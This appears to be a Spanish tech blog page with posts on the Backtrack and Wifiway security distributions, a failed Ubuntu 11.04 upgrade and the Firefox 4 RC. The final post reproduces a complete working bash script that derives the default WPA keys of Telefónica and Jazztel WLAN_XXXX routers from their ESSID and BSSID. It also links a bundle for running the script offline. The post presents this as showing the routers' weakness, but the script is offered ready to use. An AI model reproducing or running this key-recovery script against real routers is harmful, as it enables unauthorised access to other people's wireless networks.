Backtrack y Wifiway: Dos sistemas operativos diferentes.

Hace tiempo comencé a indagar sobre la seguridad en redes inalámbricas. Cuando en Ubuntu tuve muchas dificultades para parchear los drivers de las tarjetas wifi ( necesario para inyectar ) decidí utilizar una de estas dos Live-CD. Comencé con Wifiway por su soporte en español pero ahora uso Backtrack en la reciente versión 5 por ser más “adaptable”.

Como al principio no conocía ningún sistema y no encontré ningún articulo que hiciese que me decantase por alguno de los dos, escribo este post por si a alguien le ayuda.

Wifiway

Wifiway esta orientado especialmente a la seguridad inalámbrica (bluetooth , wifi y alguna aplicacion para infrarojos) con alta compatibilidad con muchísimos chipset ( funciona en muchas tarjetas). Además tiene una gran aceptación en España y la comunidad hispanoablante porque está desarroyado por la comunidad de Seguridadwireless, muy relacionada con elhacker.net, ambos de lo mejorcito en español. Se graba comodamente en un CD y se puede instalar en el disco duro

Backtrack

Backtrack tiene mas usos que Wifiway. Además de a la seguridad inalámbrica tiene herramientas de todo tipo: forense, ingeniería inversa, programación… Trata la mayoría de los temas de seguridad informática. Es más “moldeable” dado que te permite instalar la versión de 32 0 64 bits, con Kde o Gnome. Está basada en Ubuntu y posee sus propios repositorios con programas y actualizaciones de todo tipo que hacen que “casi” se pueda usar de escritorio principal, aunque todavía conservo Ubuntu. Claro que todo ese software hace que sea compatible con una lista reducida de chipsets y necesita un DVD
Se puede instalar cómodamente en el disco duro junto a otros SO, con el mismo asistente que Ubuntu.>

Posted in General | 1 Comment

Actualización no exitosa de ubuntu 11.04

Hoy salió esta nueva versión del ya conocido Ubuntu. Los cambios más significativos son visuales: un nuevo menú más dinámico que el clásico.

Hoy me disponía a actualizarlo desde la versión anterior, y lo único que puedo decir es que fue un desastre. Cannonical debió de prever una saturación en los servidores, y aún así, estaban saturados. La descarga me tomo 45 min desde mi conexion de banda ancha. Cuando terminó, por culpa de un par de archivos fallidos (eran mas de 1000 a descargar), se cancelo la instalación y vuelta a empezar.

Yo voy a esperar un par de días a ver si se calman los servidores, pero si no se os actualiza bien, y queréis disponer ya de la última versión, podéis descargar y quemar el CD y usarlo como una instalación, solo que seleccionar actualización en vez de instalación (el nuevo live-CD detecta instalaciones anteriores).

Posted in General, Software | 1 Comment

Firefox 4 RC en español posible definitivo

Hacia tiempo que podíamos disfrutar usando y mejorando las versiones beta de este nuevo Firefox. Ahora la RC (Relase Candidate), o lo que es lo mismo, la versión definitiva a no ser que se descubran nuevos errores se puede desacargar y usar gratuitamente en varias plataformas y en español. Adelántate y consiguelo.

Descargar: (Windows) Mozilla Firefox 4.0 RC Spanish

Posted in General | 1 Comment

WPA Craqueada en segundos

Hace poco se publicó en internet un script que conseguía las claves de los wifis WLAN_XXXX y JAZZTEL_XXXX.  Este algoritmo consigue la clave WPA por defecto que usan los routers de Jazztel y Telefónica, en un instante, demostrando la inseguridad de estos sistemas.

El script que se cree original es el siguiente, por   “a.s.r.”

#!/bin/bash                                                                     

echo CalcWLAN by a.s.r                                                          

if [ $# -ne 2 ]
then
        echo "Usage: $0 <ESSID> <BSSID>"
        echo
        echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
        exit 1
fi                                                                              

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  

echo "La puta clave es $KEY"

Este script bash calcula puta clave, como dicen los comentarios del programa.

Se pueden encontrar varias versiones online como esta pero si no tenemos internet nos conviene tenerlo en nuestro pc, por eso se puede descargar de la misma página los script en php, batch, bash y python entre otros. Recuerda que necesitas algun programa MD5

Aquí puedes descargar todo lo necesario para probarlo offline en windows:  el script de la página anterior y un MD5 (importante: el MD5 debe de estar en el mismon directorio que el script)
http://www.megaupload.com/?d=WDSK8JJX

Posted in General, Seguridad, Software | 3 Comments